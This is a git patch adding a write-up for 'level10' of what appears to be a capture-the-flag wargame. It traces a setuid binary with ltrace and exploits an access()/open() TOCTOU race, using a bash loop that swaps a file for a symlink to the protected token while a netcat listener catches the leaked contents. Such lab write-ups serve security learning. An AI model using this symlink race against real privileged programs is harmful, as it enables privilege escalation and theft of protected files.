From 3cc389794997510660e61384de3b835f1a299fb9 Mon Sep 17 00:00:00 2001
From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com>
Date: Mon, 18 Nov 2024 22:39:23 +0100
Subject: [PATCH] Update README.mdx
---
 level10/README.mdx | 98 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 98 insertions(+)
diff --git a/level10/README.mdx b/level10/README.mdx
index fc0edc1..5b92e70 100644
--- a/level10/README.mdx
+++ b/level10/README.mdx
@@ -54,5 +54,103 @@ printf("Connecting to %s:6969 .. ", "localhost") = 32 ^^^^ 🟡 fflush(0xb7fd1a20Connecting to localhost:6969 .. ) = 0 ^^^^ 🟡 + +Idea +- it eems the program interacts with `localhiost:6969` +- we need a valid Host IP : + - `127.0.0.1` or an old trick + - `ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2` + +With correct IP: + +```b +> ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2) +Connecting to Localhost:6969 .. Connected! +Sending file .. wrote file! +```b + +Inspect w/ `ltrace`: + +```b +> ltrace ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2) +__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 +access("/tmp/tmp", 4) = 0 +printf("Connecting to %s:6969 .. ", "Localhost") = 32 +fflush(0xb7fd1a20Connecting to Localhost:6969 .. ) = 0 +socket(2, 1, 0) = 3 +inet_addr("Localhost") = 0x0100007f +htons(6969, 1, 0, 0, 0) = 14619 +connect(3, 0xbffff71c, 16, 0, 0) = 0 +write(3, ".*( )*.\n", 8) = 8 +printf("Connected!\nSending file .. "Connected! +) = 27 +fflush(0xb7fd1a20Sending file .. ) = 0 +open("/tmp/tmp", 0, 010) = 4 + ^^^^^^^^ 🟡 here is where we hope to force our token in +read(4, "", 4096) = 0 +write(3, "", 0) = 0 +puts("wrote file!"wrote file! +) = 12 ++++ exited (status 12) +++ +``` + +Maybe it sends content of our file to `localhost:6969` +- try and intercept the content +- for that we use a 2nd terminal + +```b +# t1 +> nc -lk 6969 +``` +```b +# t2 +> ./level10 /tmp/tmp Localhost +> Connecting to Localhost:6969 .. Connected! +Sending file .. wrote file! 
+``` + +Figure out a way to make `./level10` to read the true `token`: +- exploit `access()`'s [TOCTOU](https://stackoverflow.com/questions/75587120/how-to-handle-toctou-problem-between-access-and-unlink) vulnerability +- design a file to do the following: + - when `access()` is called it checks the low-priority file + - after that, `./level10` should `open()` and `read()` the high-priotity one + +Solution: \ +to trick `access` we need a file that _alternates_ its type +- a file of our own permission level +- a symlink of the same name linked to `token` +- we need an alternation script + +`alternate.sh` +```b +#!/bin/bash + +t=/tmp/tmp + +#timeout 2s bash -c ' +while true; do + touch $t + rm -rf $t + ln -s /home/user/level10/token $t + rm -rf $t +done +#' ``` +- and a script to run `alternate` and `./level10` side by side + +`trylevel.s` +```b +#!/bin/bash + +#timeout 2s bash -c ' +while true; do + /home/user/level10/level10 /tmp/tmp 127.0.0.1 >/dev/null +done +#' +``` + +- and a 3rd script to unite two previous ones and `netcat` +```b +/tmp/alternate.sh 2>/dev/null & /tmp/runner.sh >/dev/null & nc -lk 6969 +```